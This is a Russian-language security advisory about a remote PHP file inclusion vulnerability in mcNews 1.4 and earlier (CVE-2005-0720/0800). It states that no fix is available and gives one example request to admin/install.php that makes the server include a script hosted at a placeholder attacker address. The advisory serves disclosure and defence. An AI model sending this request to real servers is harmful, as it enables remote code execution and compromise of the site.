PHP-инклюдинг в mcNews

Дата публикации:
21.03.2005
Дата изменения:
16.10.2006
Всего просмотров:
809
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0720
CVE-2005-0800
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
mcNews 1.x
Уязвимые версии: mcNews 1.4 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на целевой системе.

Уязвимость существует при обработке входных данных в параметре 'l' сценария 'admin/install.php'. Удаленный пользователь может указать в качестве параметра переменной 'l' произвольный файл и выполнить его с привилегиями web сервера на системе. Пример:

http://[target]/path/to/mcnews/admin/install.php?l=http://[attacker]/source

URL производителя: http://www.phpforums.net/index.php?dir=dld

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP mcNews arbitrary file inclusion

или введите имя

CAPTCHA